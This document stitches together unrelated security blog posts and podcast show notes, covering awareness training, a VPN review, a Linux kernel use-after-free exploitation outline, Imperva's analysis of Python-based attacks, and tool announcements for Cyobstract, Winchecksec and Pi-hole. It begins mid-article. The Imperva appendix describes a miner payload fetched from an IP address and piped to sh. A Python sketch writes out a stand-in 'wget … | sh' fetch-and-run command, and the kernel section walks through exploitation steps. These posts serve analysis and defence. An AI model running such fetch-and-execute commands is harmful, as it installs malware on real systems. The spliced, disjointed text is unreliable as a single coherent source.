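The key design point is the "due" field: training is triggered immediately by the event, but the employee gets until end of day so a critical task isn't interrupted.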
Additionally, you’ll be running ongoing training and simulations with employees. You’ll perform some analysis to pinpoint the employees who can’t seem to stop clicking things. These employees can get more intensive training, and escalation if they continue to violate corporate policies and put data at risk.
After initial triage and integration with your security controls, you’ll work with HR to overhaul the training delivered during their onboarding process. You are now training employees continuously, so you don’t need to spend 3 hours teaching them about phishing and the hazards of clicking links.
Then onboarding can shift, to focus on establishing a culture of security from Day 1. This entails educating new employees on online and technology policies, and acceptable use expectations. You also have an opportunity to set expectations for security awareness training. Make clear that employees will be tested on an ongoing basis, and inform them who sees the results (their managers, etc.), along with the consequences of violating acceptable use policies.
Again, a fine line exists between being draconian and setting clear expectations. If the consequences have teeth (as they should), employees must know, and sign off on their understanding. We also recommend you test each new employee within a month of their start date to ensure they comprehend security expectations and retained their initial lessons.
Start a Competition
Once your program settles in over six months or so, it’s time to shake things up again. You can set up a competition, inviting the company to compete for the Chairperson’s Security Prize. Yes, you need to get the Chairperson on board for this, but that’s usually pretty easy because it helps the company. The prize needs to be impactful, and more than bragging rights. Maybe you can offer the winning department an extra day of holiday for the year. And a huge trophy. Teams love to compete for trophies they can display prominently in their area.
You’ll set the ground rules, including an internal red team and hunting team attacking each group. You’ll be tracking how many employees fall for the attacks and how many report the issues. Your teams can try physically breaching the facilities as well. You want the attacks to dovetail with ongoing security training and testing initiatives to reinforce security culture.
Run Another Simulation
You’ll also want to stage a widespread simulation a few months after the initial foray. Yes, you’ll be continuously testing employees as part of your continuous program. But getting a sense of company-wide results is also helpful. You should compare results from the initial test against the new results. Are fewer employees falling for the ruse? Are more reporting spammy and phishing emails to the central group? Ensuring the trend lines are moving in the right direction boosts the program and helps justify ongoing investment. You feed the results into the team scoring of the competition.
Lather, Rinse, Repeat
At some point, when another high-profile issue presents itself, you should take a similar approach. Let’s say your organization does a lot of business in Europe, so GDPR presents significant risk. You’ll want to train employees on how you define customer data and how to handle it.
Next, determine whether you need special training for this issue, or whether you can integrate it into your more extensive semi-annual training for all employees. Every six months, all employees sit for perhaps an hour, watching an update on both new hacker tactics and changes to corporate security policies.
Once that round of training completes, you will roll out new tests to highlight how customer data could be lost or stolen. Factor the new tests into your next competition as well, to keep focus on the changing nature of security and the ongoing contest.
Once your program is humming along, we suggest you pick a new high priority topic every six months to make that the focus of your semi-annual scheduled training. As part of addressing this new topic, you’ll integrate with the relevant controls to enable ongoing contextual training and perform an initial test (to establish a baseline), and then track improvement over time.
You’ll also want a more comprehensive set of reports to track the effectiveness of your awareness training; deliver this information to senior management, and perhaps the audit committee. Maybe each quarter you’ll report on how much contextual training employees received, and how much or little they repeated mistakes after training. You’ll also want to report on the overall number of successful attacks, alongside trends of which attacks worked and which got blocked. Being able to map those results back to training topics makes an excellent case for ongoing investment.
At some point the competition will end and you’ll crown the winner. We suggest making a big deal of the winning team. Maybe you can record the award ceremony with the chairperson and memorialize their victory in the company newsletter. You want to make sure all employees understand security is essential and visible at the highest echelons of your organization.
It’s a journey, not a destination, so ensure consistency in your program. Add new focus topics to extend your employee knowledge, keep your content current and interesting, and hold your employees to a high standard – make sure they understand expectations and the consequences of violating corporate policies. Building a security culture requires patience, persistence, and accountability. Anchoring your security awareness training program with continuous, contextual content will go a long way to establishing such a security culture.
With that we wrap up this series on Making an Impact with Security Awareness Training. Thanks again to Mimecast for licensing this content, and we’ll have the assembled and edited paper available in our Research Library within a couple weeks. - Mike Rothman
If you’ve been in the information security field for at least a year, you’ve undoubtedly heard your organization defend the lack of investment in, change to, or optimization of a cybersecurity policy, mitigating control, or organizational belief. This “It hasn’t happened to us, so it likely won’t happen” mentality is called optimism bias, and it’s an issue in our field that predates the field itself.
Threats are constantly evolving and, just like everything else, tend to follow certain trends. Whenever a new type of threat is especially successful or profitable, many others of the same type will inevitably follow. The best defenses need to mirror those trends so users get the most robust protection against the newest wave of threats. Along those lines, Gartner has identified the most important categories in cybersecurity technology for the immediate future.
We wanted to dive into the newest cybersecurity products and services from those hot categories that Gartner identified, reviewing some of the most innovative and useful from each group. Our goal is to discover how cutting-edge cybersecurity software fares against the latest threats, hopefully helping you to make good technology purchasing decisions.
F-Secure Freedome in brief:
- P2P allowed: No
- Business location: Finland
- Number of servers: N/A
- Number of country locations: 22
- Cost: $50-$80 per year
- VPN protocol: OpenVPN
- Data encryption: AES 128-bit
- Data authentication: AES 128-bit
- Handshake encryption: 2048-bit RSA keys with SHA-256 certificates
A few VPN services offer their own antivirus: one is Avira Phantom VPN Pro, which we looked at previously; Finland-based F-Secure is another. The company’s Freedome VPN is a premium service that offers 22 country locations around the world and extra freebies like tracker and malicious-site blocking.
This week, Paul and Matt Alderman talk about threat and vulnerability management, and how cloud and application security are impacting vendor integration in the enterprise! In the Enterprise News this week, Bomgar to be renamed BeyondTrust after acquisition, Attivo brings cyber security deception to containers and serverless, Symantec extends data loss prevention platform with DRM, ExtraHop announces the availability of Reveal(x) for Azure, and Cloud Native applications are at risk from Zero Touch attacks! All that and more on this episode of Enterprise Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/ES_Episode108
Visit https://www.securityweekly.com/esw for all the latest episodes!
Visit https://www.activecountermeasures.com/esw to sign up for a demo or buy our AI Hunter!
→Visit our website: https://www.securityweekly.com
→Follow us on Twitter: https://www.twitter.com/securityweekly
→Like us on Facebook: https://www.facebook.com/secweekly
Threat groups such as GOLD KINGSWOOD are using their extensive resources and network insights to target high-value financial organizations around the world.
Last year, reports surfaced that Uber had been hit with a data breach, but instead of reporting it to the government or to those affected, it chose to cover it up. Now, the company will pay $148 million as part of a settlement, and the money will be disbursed among the US states and Washington, DC. After the hack and Uber's response to it became public, a number of states launched investigations into the incident while others filed lawsuits.
Source: New York Attorney General
Reachability and Impact
BUG_ON(), WARN_ON_ONCE(), and dmesg
- kernel.panic_on_oops will automatically cause a kernel panic when a BUG_ON() assertion triggers or the kernel crashes; its initial value can be configured using the build configuration variable CONFIG_PANIC_ON_OOPS. It is off by default in the upstream kernel (enabling it by default in distributions would probably be a bad idea), but it is enabled by Android, for example.
- kernel.dmesg_restrict controls whether non-root users can access dmesg logs, which, among other things, contain register dumps and stack traces for kernel crashes; its initial value can be configured using the build configuration variable CONFIG_SECURITY_DMESG_RESTRICT. It is off by default in the upstream kernel, but is enabled by some distributions, e.g. Debian. (Android relies on SELinux to block access to dmesg.)
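Both knobs can be checked straight from /proc/sys on a Linux box. A minimal Python sketch (the helper names are ours; it returns None where the sysctl does not exist, e.g. on non-Linux systems):

```python
# Minimal sketch for checking the hardening sysctls discussed above by reading
# /proc/sys directly. Helper names are ours, not any library's API.

import os

def sysctl_path(name):
    """Translate a sysctl name like 'kernel.dmesg_restrict' to its /proc/sys path."""
    return "/proc/sys/" + name.replace(".", "/")

def read_sysctl(name):
    path = sysctl_path(name)
    if not os.path.exists(path):
        return None  # sysctl absent (or not a Linux system)
    with open(path) as f:
        return f.read().strip()

for knob in ("kernel.panic_on_oops", "kernel.dmesg_restrict"):
    print(knob, "=", read_sysctl(knob))  # "1" means the hardening is enabled
```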
The exploit: Incrementing the sequence number
The exploit: Replacing the VMA
- Get the vm_area_struct reused in the same process. The process would then be able to use this VMA, but this doesn't result in anything interesting, since the VMA caches of the process would be allowed to contain pointers to the VMA anyway.
- Free the vm_area_struct such that it is on the slab allocator's freelist, then attempt to access it. However, at least the SLUB allocator that Ubuntu uses replaces the first 8 bytes of the vm_area_struct (which contain vm_start, the userspace start address) with a kernel address. This makes it impossible for the VMA cache lookup function to return it, since the condition vma->vm_start <= addr && vma->vm_end > addr can't be fulfilled, and therefore nothing interesting happens.
- Free the vm_area_struct such that it is on the slab allocator's freelist, then allocate it in another process. This would (with the exception of a very narrow race condition that can't easily be triggered repeatedly) result in hitting the WARN_ON_ONCE(), and therefore the VMA cache lookup function wouldn't return the VMA.
- Free the vm_area_struct such that it is on the slab allocator's freelist, then make an allocation from a slab that has been merged with the vm_area_struct slab. This requires the existence of an aliasing slab; in an Ubuntu 18.04 VM, no such slab seems to exist.
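To make the failed-lookup argument concrete, here is a toy Python model (ours, not kernel code) of the VMA cache check, showing why a vm_start overwritten with a kernel freelist pointer can never match a userspace address:

```python
# Toy model of the VMA cache lookup predicate: a cached entry is only returned
# when vma.vm_start <= addr < vma.vm_end. Not kernel code; for illustration only.

class VMA:
    def __init__(self, vm_start, vm_end):
        self.vm_start = vm_start
        self.vm_end = vm_end

def vmacache_hit(vma, addr):
    return vma.vm_start <= addr < vma.vm_end

vma = VMA(vm_start=0x7F0000000000, vm_end=0x7F0000001000)
assert vmacache_hit(vma, 0x7F0000000800)  # normal case: lookup succeeds

# SLUB's freelist pointer overwrites the first 8 bytes (vm_start) with a kernel
# address, so no userspace address can satisfy the check anymore:
vma.vm_start = 0xFFFF880000000000
assert not vmacache_hit(vma, 0x7F0000000800)
```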
- advantage: not wiped on allocation
- advantage: permits writing at an arbitrary in-page offset if splice() is available
- advantage: page-aligned
- disadvantage: can't do multiple writes without first freeing the page, then reallocating it
- advantage: can repeatedly read and write contents from userspace
- advantage: page-aligned
- disadvantage: wiped on allocation
The exploit: Leaking pointers from dmesg
- address of the mm_struct
- address of the use-after-free'd VMA
- load address of kernel code
The exploit: JOP (the boring part)
- A patch lands in the upstream kernel.
- The patch is backported to an upstream-supported stable kernel.
- The distribution merges the changes from upstream-supported stable kernels into its kernels.
- Users install the new distribution kernel.
Python will soon be the world’s most prevalent coding language.
That’s quite a statement, but if you look at its simplicity, flexibility and the relative ease with which folks pick it up, it’s not hard to see why The Economist recently touted it as the soon-to-be most used language, globally. Naturally, our threat research team had to poke around and see how popular Python is among bad actors.
And the best place to do that is, well, GitHub, of course. By rough estimate, more than 20% of GitHub repositories that implement an attack tool or exploit PoC are written in Python. In virtually every security-related topic on GitHub, the majority of the repositories are written in Python, including tools such as w3af, Sqlmap, and even the infamous AutoSploit tool.
At Imperva, we use an advanced, intelligent client classification mechanism that distinguishes and classifies various web clients. When we look at our data on security incidents, the largest single share of the clients we identify (more than 25%, excluding vulnerability scanners) is Python-based.
Unlike with other clients, with Python we see a host of different attack vectors and the use of known exploits. Hackers, like developers, enjoy Python’s advantages, which makes it a popular hacking tool.
Figure 1: Security incidents by client, excluding vulnerability scanners. More than 25% of the clients were Python-based tools used by malicious actors, making it the most common vector for launching exploit attempts.
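As a rough illustration of one signal a client classifier can key on: Python's popular HTTP libraries send distinctive default User-Agent strings. This sketch is ours; a production classifier (such as Imperva's) combines far more signals than this.

```python
# Illustrative only: flag clients whose User-Agent matches the default strings
# sent by common Python HTTP libraries (requests, urllib, aiohttp).

PYTHON_UA_PREFIXES = ("python-requests/", "python-urllib/", "python/", "aiohttp/")

def looks_like_python_client(user_agent):
    """Cheap heuristic: does this User-Agent look like a Python HTTP library?"""
    return user_agent.lower().startswith(PYTHON_UA_PREFIXES)

print(looks_like_python_client("python-requests/2.19.1"))        # True
print(looks_like_python_client("Python-urllib/3.6"))             # True
print(looks_like_python_client("Mozilla/5.0 (Windows NT 10.0)")) # False
```

Of course, an attacker can trivially spoof the User-Agent, which is exactly why real classification relies on many behavioral signals rather than this one header.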
When examining the use of Python in attacks against sites we protect, the result was unsurprising – a large chunk, up to 77%, of the sites were attacked by a Python-based tool, and in over a third of the cases a Python-based tool was responsible for the majority of daily attacks. These levels, over time, show that Python-based tools are used for both breadth and depth scanning.
Figure 2: Daily percentage of sites suffering Python-based attacks
The two most popular Python modules used for web attacks are Urllib and Python Requests. The chart below shows attack distribution. Use of the new module, Async IO, is just kicking off, which makes perfect sense when you consider the vast possibilities the library offers in the field of layer 7 DDoS; especially when using a “Spray N’ Pray” technique:
Python and Known Exploits
The advantages of Python as a coding language make it a popular tool for implementing known exploits. We collected information on the top 10 vulnerabilities recently used by a Python-based tool, and we don’t expect it to stop.
The two most popular attacks in the last two months used CVE-2017-9841, a PHP-based remote code execution (RCE) vulnerability in the PHPUnit framework, and CVE-2015-8562, an RCE vulnerability in the Joomla! framework. It isn’t surprising that the most common attacks had RCE potential, considering how valuable that capability is to malicious actors.
Another example, which isn’t in the top 10, is CVE-2018-1000207, which had hundreds of attacks each day for several days during the last week of August 2018. Deeper analysis shows that the attack was carried out on multiple protected customers, by a group of IPs from China.
CVEs over time
You can see that the number of CVEs which are being used by attackers, according to our data, has increased in the last few years:
In addition, Python is used to target specific applications and frameworks – below you can find the top 10, according to our data:
When we looked at all the frameworks targeted by Python, the attacks that stand out are those aimed at Struts, WordPress, Joomla and Drupal, which is not surprising as these are currently some of the most popular frameworks out there.
The most popular HTTP parameter value we’ve seen used in attacks, responsible for around 30% of all distinct parameter values used, belongs to a backdoor upload attempt through a PHP unserialize vulnerability in Joomla! using the JDatabaseDriverMysqli object. The uploaded backdoor payload is hosted on ICG-AuthExploiterBot.
We’ve also seen a recurring payload that turned out to be a Coinbitminer infection attempt; more details are in the appendix, which is meant only as an example. Since Python is so widely used by hackers, there is a host of different attack vectors to take into consideration. Python requires minimal coding skill, making it easy to write a script and exploit a vulnerability.
Unless you can differentiate between requests from Python-based tools and any other tool, our recommendations stay the same – make sure to keep security in mind when developing, keep your system up to date with patches, and refrain from any practice that is considered insecure.
Appendix – Example of an Attack
Here’s an interesting, recurring payload we’ve observed (with a small variance at the end):
After base64 decoding it, we get a binary payload:
In the above payload, there is a mention of a GitHub repository for a deserialization exploitation tool and a wget command download in a jpg file, which strongly suggests there is malicious activity. After downloading the file from http://188.8.131.52/jre.jpg we can see that it’s actually a script containing the following:
The two last lines in the script try to get http://184.108.40.206/static/font.jpg%7Csh, which is identified as Trojan.Coinbitminer by Symantec Endpoint Protection.
This finding relates to a tweet from the end of August 2018 about a new Apache Struts vulnerability, CVE-2018-11776, being used to infect victims with the same Coinbitminer.
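The triage steps from this appendix (base64-decode the parameter, then look for URLs the payload fetches) can be sketched in Python. The payload below is a harmless stand-in; the real payload and hosts are deliberately not reproduced.

```python
# Sketch of the appendix triage steps on a hypothetical payload:
# decode the base64 parameter, then extract any URLs the script fetches.

import base64
import re

# Stand-in for a captured parameter value (real payloads are not reproduced here)
encoded = base64.b64encode(b"wget -q http://example.invalid/jre.jpg -O- | sh")

decoded = base64.b64decode(encoded).decode("utf-8", errors="replace")

# Pull out any URLs the decoded payload tries to fetch
urls = re.findall(r"https?://[^\s|]+", decoded)
print(urls)  # ['http://example.invalid/jre.jpg']
```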
While you’re here, also read: Imperva Python SDK – We’re All Consenting SecOps Here
The post The World’s Most Popular Coding Language Happens to be Most Hackers’ Weapon of Choice appeared first on Blog.
This post is co-authored with Sam Perl.
The CERT Division of the Software Engineering Institute (SEI) at Carnegie Mellon University recently released the Cyobstract Python library as an open source tool. You can use it to quickly and efficiently extract artifacts from free text in a single report, from a collection of incident reports, from threat assessment summaries, or any other textual source.
Cybersecurity teams need to collect and process data from incident reports, blog posts, news feeds, threat reports, IT tickets, incident tickets, and more. Often incident analysts are looking for technical artifacts to help in their investigation of a threat and development of a mitigation. This activity is often done manually by cutting and pasting between sources and tools. Cyobstract helps extract key artifact values from any kind of text, allowing incident analysts to focus their attention on processing the data once it's extracted. Once artifact values are extracted, they can be more easily correlated across multiple datasets.
After Cyobstract extracts security-relevant data types, the data can be used for higher-level downstream analysis and investigation of the source incident reports and data. The resulting data can also be loaded into a database, such as an indicator database. Using Cyobstract, the extracted artifacts can be used to quickly and easily find commonality and similarity across reports, thereby potentially revealing patterns that might otherwise have remained hidden.
At its core, the Cyobstract library is built around a collection of robust regular expressions that target 24 specific security-relevant data types of potential interest, including the following:
- IP addresses: IPv4, IPv4 CIDR, IPv4 range, IPv6, IPv6 CIDR, and IPv6 range
- hashes: MD5, SHA1, SHA256, and ssdeep
- Internet and system-related strings: FQDN, URL, user agent strings, email addresses, filenames, filepath, and registry keys
- Internet infrastructure values: ASN, ASN owner, country, and ISP
- security analysis values: CVE, malware, and attack type
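Cyobstract's production patterns aren't reproduced here, but the core idea (targeted, type-specific regular expressions applied to free text) can be sketched in a few lines of plain Python. The patterns below are deliberately simplified stand-ins, not the library's actual expressions:

```python
import re

# Simplified patterns for three of the data types listed above.
# Cyobstract's real regexes are far more robust (stricter boundaries,
# defanging variants, fewer false positives).
PATTERNS = {
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "md5": re.compile(r"\b[a-fA-F0-9]{32}\b"),
    "cve": re.compile(r"\bCVE-\d{4}-\d{4,}\b"),
}

def extract_artifacts(text):
    """Return a dict mapping artifact type to the values found in text."""
    return {name: pat.findall(text) for name, pat in PATTERNS.items()}

report = ("Host 10.0.0.5 fetched a dropper (md5 "
          "d41d8cd98f00b204e9800998ecf8427e) exploiting CVE-2018-11776.")
print(extract_artifacts(report))
```

Real-world patterns need to be far more careful about boundaries and false positives (version strings that look like IP addresses, for instance), and about the defanged indicator forms discussed next.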
Cyobstract is capable of extracting these artifacts even if they are malformed in some way. For example, in the incident response community it's standard practice for many teams to "defang" indicators of compromise before storing them or sending them to another team. Defanged indicator values can be difficult for automated solutions to extract, and because there is no standard practice for defanging, it can be done in many different ways. Cyobstract was built from a large collection of real incident reports from many organizations, so it handles the defanging styles that CERT researchers have observed in the field.
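To make the defanging problem concrete, here is a small illustrative refanging normalizer. The substitution rules cover a few conventions commonly seen in the wild (hxxp://, [.], (dot), [at]); this is a sketch of the general technique, not Cyobstract's actual rule set:

```python
import re

# A few defanging conventions seen in the wild; there is no standard,
# so real extractors must handle many variants.
REFANG_RULES = [
    (re.compile(r"hxxp(s?)://", re.IGNORECASE), r"http\1://"),
    (re.compile(r"\[\.\]|\(\.\)|\{\.\}"), "."),
    (re.compile(r"\s*\(dot\)\s*", re.IGNORECASE), "."),
    (re.compile(r"\[at\]|\(at\)", re.IGNORECASE), "@"),
]

def refang(indicator):
    """Normalize a defanged indicator back to its true form."""
    for pattern, repl in REFANG_RULES:
        indicator = pattern.sub(repl, indicator)
    return indicator

print(refang("hxxp://evil[.]example[.]com/payload"))  # http://evil.example.com/payload
print(refang("alice[at]example(dot)com"))             # alice@example.com
```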
In addition to the core extraction library, Cyobstract includes developer tools that teams can use to craft their own regular expressions and capture custom security data types. Analysts typically do this by using a list of names to extract; however, over time, that list can be large and slow to use in matching. Using Cyobstract, analysts can input their lists of terms to match (such as a list of common malware names) and get an optimized regex as output. This expression is significantly faster than trying to match directly to a name on a list.
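A minimal version of that list-to-regex idea can be sketched as follows. This naive variant just escapes each term and orders alternatives longest-first inside a single compiled alternation; Cyobstract's generator is presumably more sophisticated (e.g., factoring shared prefixes trie-style), so treat this as an illustration of why one compiled pattern beats looping over a list:

```python
import re

def terms_to_regex(terms):
    """Compile a list of literal terms into one alternation regex.

    Longest-first ordering ensures 'emotet_v2' wins over 'emotet',
    and a single compiled pattern is much faster than testing each
    term against the text in a Python loop.
    """
    ordered = sorted(set(terms), key=len, reverse=True)
    pattern = r"\b(?:%s)\b" % "|".join(re.escape(t) for t in ordered)
    return re.compile(pattern, re.IGNORECASE)

# Hypothetical malware-name list for illustration.
malware_names = ["emotet", "emotet_v2", "trickbot", "coinbitminer"]
rx = terms_to_regex(malware_names)
text = "The host beaconed to a TrickBot C2 and later dropped Coinbitminer."
print(rx.findall(text))  # ['TrickBot', 'Coinbitminer']
```

Even this simple version turns N separate substring scans into a single pass over the text.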
The library also includes benchmarking tools that can track the effect of changes to regular expressions and present the analyst with feedback on the overall effectiveness of the individual change (e.g., this regex change found three more reports than the previous version).
The Cyobstract library can be downloaded from GitHub at https://github.com/cmu-sei/cyobstract.
Google’s Chrome 69 hides a disturbing twist: if you log into Gmail or another Google service, Chrome seems to automatically log you into the browser as well. Theoretically, that means that you will automatically begin sharing data with Google, like it or not.
The confusion comes from a new way in which Google shows your “logged in” status. Previously, if you were signed in to Chrome, an icon would appear in the upper right-hand corner, indicating that you were signed in and sharing data. The same icon now appears if you’re logged into a Google service like Google.com or Gmail, but not necessarily to Chrome.
Update 9/26/18: Google has announced upcoming changes to the way Chrome 70 handles sign-ins to address this issue.
We’re proud to announce the release of Winchecksec, a new open-source tool that detects security features in Windows binaries. Developed to satisfy our analysis and research needs, Winchecksec aims to surpass current open-source security feature detection tools in depth, accuracy, and performance without sacrificing simplicity.
Feature detection, made simple
Winchecksec takes a Windows PE binary as input, and outputs a report of the security features baked into it at build time. Common features include:
- Address-space layout randomization (ASLR) and 64-bit-aware high-entropy ASLR (HEASLR)
- Authenticity/integrity protections (Authenticode, Forced Integrity)
- Data Execution Prevention (DEP), better known as W^X or No eXecute (NX)
- Manifest isolation
- Structured Exception Handling (SEH) and SafeSEH
- Control Flow Guard (CFG) and Return Flow Guard (RFG)
- Guard Stack (GS), better known as stack cookies or canaries
Winchecksec’s two output modes are controlled by one flag (-j): the default plain-text tabular mode for humans, and a JSON mode for machine consumption. In action:
Did you notice that Winchecksec distinguishes between “Dynamic Base” and ASLR above? This is because setting /DYNAMICBASE at build time does not guarantee address-space randomization. Windows cannot perform ASLR without a relocation table, so binaries that explicitly request ASLR but lack relocation entries (indicated by IMAGE_FILE_RELOCS_STRIPPED in the image header’s flags) are silently loaded without randomized address spaces. This edge case was directly responsible for turning an otherwise moderate use-after-free in VLC 2.2.8 into a gaping hole (CVE-2017-17670). The underlying toolchain error in mingw-w64 remains unfixed.
Similarly, applications that run under the CLR are guaranteed to use ASLR and DEP, regardless of the state of the Dynamic Base/NX compatibility flags or the presence of a relocation table. As such, Winchecksec will report ASLR and DEP as enabled on any binary that indicates that it runs under the CLR. The CLR also provides safe exception handling but not via SafeSEH, so SafeSEH is not indicated unless enabled.
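The decision logic described in the last two paragraphs can be expressed as a small predicate over the relevant PE header flags. The flag values below come from the PE/COFF specification; the function is a sketch of the rules as stated above, not Winchecksec's actual implementation:

```python
# PE header flag values from the Microsoft PE/COFF specification.
IMAGE_FILE_RELOCS_STRIPPED = 0x0001             # FileHeader.Characteristics
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040  # OptionalHeader.DllCharacteristics

def effective_aslr(file_characteristics, dll_characteristics, is_clr=False):
    """Decide whether a binary will actually get ASLR at load time.

    Mirrors the rules above: /DYNAMICBASE alone is not enough, because
    the loader silently skips randomization when the relocation table
    has been stripped. CLR binaries are always randomized.
    """
    if is_clr:
        return True
    wants_aslr = bool(dll_characteristics & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)
    has_relocs = not (file_characteristics & IMAGE_FILE_RELOCS_STRIPPED)
    return wants_aslr and has_relocs

# The VLC 2.2.8 case: Dynamic Base requested, but relocations stripped.
print(effective_aslr(file_characteristics=0x0001, dll_characteristics=0x0040))  # False
```

In a real tool these values would be read from the binary itself (e.g., with a PE parser); the point here is only the decision, not the parsing.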
How do other tools compare?
- Microsoft released BinScope in 2014, only to let it wither on the vine. BinScope performs several security feature checks and provides XML and HTML outputs, but relies on .pdb files for its analysis of binaries. As such, it’s impractical for any use case outside of the Microsoft Secure Development Lifecycle. BinSkim appears to be the spiritual successor to BinScope and is actively maintained, but uses an obtuse, overengineered format for machine consumption. Like BinScope, it also appears to depend on the availability of debugging information.
- The Visual Studio toolchain provides dumpbin.exe, which can be used to dump some of the security attributes present in a given binary. But dumpbin.exe doesn’t provide machine-consumable output, so developers are forced to write ad-hoc parsers. To make matters worse, dumpbin.exe provides a dump, not an analysis, of the given file. It won’t, for example, explain that a program with stripped relocation entries and Dynamic Base enabled isn’t ASLR-compatible. It’s up to the user to put two and two together.
- NetSPI maintains PESecurity, a PowerShell script for testing many common PE security features. While it provides a CSV output option for programmatic consumption, it lags in performance compared to dumpbin.exe (and the other compiled tools listed below), much less Winchecksec.
- There are a few small feature detectors floating around the world of plugins and gists, like this one, this one, and this one (for x64dbg!). These are generally incomplete (in terms of checks), difficult to interact with programmatically, sporadically maintained, and/or perform ad-hoc PE parsing. Winchecksec aims for completeness in the domain of static checks, is maintained, and uses official Windows APIs for PE parsing.
Winchecksec was developed as part of Sienna Locomotive, our integrated fuzzing and triaging system. As one of several triaging components, Winchecksec informs our exploitability scoring system (reducing the exploitability of a buffer overflow, for example, if both DEP and ASLR are enabled) and allows us to give users immediate advice on improving the baseline security of their applications. We expect that others will develop additional use cases, such as:
- CI/CD integration to make a base set of security features mandatory for all builds.
- Auditing entire production servers for deployed applications that lack key security features.
- Evaluating the efficacy of security features in applications (e.g., whether stack cookies are effective in a C++ application with a large number of buffers in objects that contain vtables).
This week, Keith and special guest host April Wright interview Ron Gula, Founder of Tenable and Gula Tech Adventures! They discuss security in the upcoming elections, how to maintain separation of duties, attack simulation, and more! In the Application Security News, Hackers stole customer credit cards in Newegg data breach, John Hancock now requires monitoring bracelets to buy insurance, the man who broke Ticketmaster, new security settings available in iOS 12, State Department confirms data breach exposed employee data, and more!
Full Show Notes: https://wiki.securityweekly.com/ASW_Episode33
Visit https://www.securityweekly.com/asw for all the latest episodes!
Visit https://www.activecountermeasures.com/asw to sign up for a demo or buy our AI Hunter!
→Visit our website: https://www.securityweekly.com
→Follow us on Twitter: https://www.twitter.com/securityweekly
→Like us on Facebook: https://www.facebook.com/secweekly
I have a love-hate relationship with ad blockers. On the one hand, I despise the obnoxious ads that are forced down our throats at what seems like every turn. On the other hand, I appreciate the need for publishers to earn a living so that I can consume their hard-earned work for free. Somewhere in the middle is a responsible approach, for example the sponsorship banner you see at the top of this blog. Companies I choose to partner with get to appear there and they get themselves 140 characters and a link. That is all. No images. No video. No script. No HTML tags. No tracking. Sponsors are happy as they get exposure, visitors are happy because there's none of the aforementioned crap and I'm happy because it pays a lot better than ads ever did anyway. It almost seems like everyone is happy. Almost...
As I wrote about a couple of years ago, ad blockers aren't always happy and frankly, attitudes like that just make the whole ad problem even worse. That post attracted hundreds of comments ranging from "I don't mind ads" to "burn them all with fire and the consequences be damned". But it's not just the detrimental impact of blocking the very source of a website's revenue that worries me, it's also the fact that running an ad blocker means giving a third party an enormous amount of power over your browser. This creates a different risk to ads themselves - a much more serious one if it comes to fruition - and it looks like this:
Do you use a popular browser extension? How confident are you that the creator wouldn’t accept a $10k offer to hand it over only to have it then go rogue on you? https://t.co/hPfW5CJLUz — Troy Hunt (@troyhunt) September 5, 2018
That's actually my top tweet over the last 4 weeks by a significant margin because it's one we can all relate to. I certainly went back and revisited all the browser extensions I had installed and killed a few unnecessary ones. Bottom line is that you really want to consider how much you trust the organisation (or in many cases, the person) behind the extensions you run and even when you do, there's no guarantee it won't be backdoored MEGA.nz style.
Which brings me to Pi-hole. I'm going to keep the intro bits as brief as possible but, in a nutshell, Pi-hole is a little DNS server you run on a Raspberry Pi in your local network then point your router at such that every device in your home resolves DNS through the service. It then blacklists about 130k domains used for nasty stuff such that when any client on your network (PC, phone, smart TV) requests sleazy-ad-domain.com, the name just simply doesn't resolve. Scott Helme put me onto this originally via his two excellent posts on Securing DNS across all of my devices with Pi-Hole + DNS-over-HTTPS + 1.1.1.1 and Catching and dealing with naughty devices on my home network. Go and read those because I'm deliberately not going to repeat them here. In fact, I hadn't even planned to write anything until I saw how much difference the service actually made. More on that in a moment, the one other bit I'll add here is that the Raspberry Pi I purchased for the setup was the Little Bird Raspberry Pi 3 Plus Complete Starter Kit:
This just made it a super easy turnkey solution. Plus, Little Bird Electronics down here in Aus delivered it really quickly and followed up with a personal email and a "thank you" for some of the other unrelated stuff I've been up to lately. Nice 🙂
I went with an absolute bare bones setup which essentially involved just following the instructions on the Pi-hole site (Scott gets a bit fancier in his blog posts). I had a bit of a drama due to some dependencies and after a quick tweet for help this morning followed by a question on Discourse, I was up and running. I set my Ubiquiti network to resolve DNS through the Pi and that's it - job done! As devices started picking up the new DNS settings, I got to see just how much difference was made. I set my desktop to manually resolve through Cloudflare's 1.1.1.1 whilst my laptop was using the Pi-hole which made for some awesome back to back testing. Here's what I found:
Let's take a popular local Aussie news site, news.com.au. Here's what it looks like with no Pi-hole:
In the grand scheme of ads on sites, not too offensive. Let's look at it from the machine routing through the Pi-hole:
Visually, there's not a whole lot of difference here. However, check out the network requests at the bottom of the browser before and after Pi-hole:
Whoa! That's an 80% reduction in network requests and an 82% reduction in the number of bytes transferred. I'd talk about the reduction in load time too except it's really hard to measure because as you can see from the waterfall diagrams, with no Pi-hole it just keeps going and going and, well, it all gets a bit silly.
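The mechanics behind those vanishing requests are simple DNS blackholing. As a toy model (the domain names here are stand-ins, and real Pi-hole is built on dnsmasq/FTL with a blocklist of roughly 130k domains):

```python
# Toy model of DNS blackholing, the core idea behind Pi-hole:
# blocked names resolve to a sinkhole address, everything else is
# forwarded upstream. Domain names below are illustrative stand-ins.
BLOCKLIST = {"sleazy-ad-domain.com", "tracker.example.net"}

def upstream(domain):
    """Pretend upstream resolver (returns a TEST-NET address)."""
    return "203.0.113.10"

def resolve(name, forward):
    """Return a sinkhole address for blocked names, else ask upstream."""
    domain = name.lower().rstrip(".")
    if domain in BLOCKLIST or any(domain.endswith("." + b) for b in BLOCKLIST):
        return "0.0.0.0"       # the request dies here; the ad never loads
    return forward(domain)     # forward everything else as normal

print(resolve("sleazy-ad-domain.com", upstream))  # 0.0.0.0
print(resolve("news.com.au", upstream))           # 203.0.113.10
```

Because the name never resolves, the browser never even opens a connection for the ad or tracker, which is exactly why the waterfall charts above collapse so dramatically.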
Let's level it up because I reckon the smuttier the publication, the bigger the Pi-hole gain. Let's try these guys:
And for comparison, when loaded with the Pi-hole in place:
And now - (drum roll) - the network requests for each:
Holy shit! What - why?! I snapped the one without Pi-hole at 17.4 mins after I got sick of waiting. 2,663 requests (one of which was to Report URI, thank you very much!) and 57.6MB. To read the freakin' news. (Incidentally, in this image more than the others you can clearly see requests to domains such as fff.dailymail.co.uk failing as the Pi-hole prevents them from resolving.)
After just a few quick tests, I was pretty blown away by the speed difference. I only fired this up at about 8am this morning and I'm just 9 hours into it but already seeing some pretty cool stats:
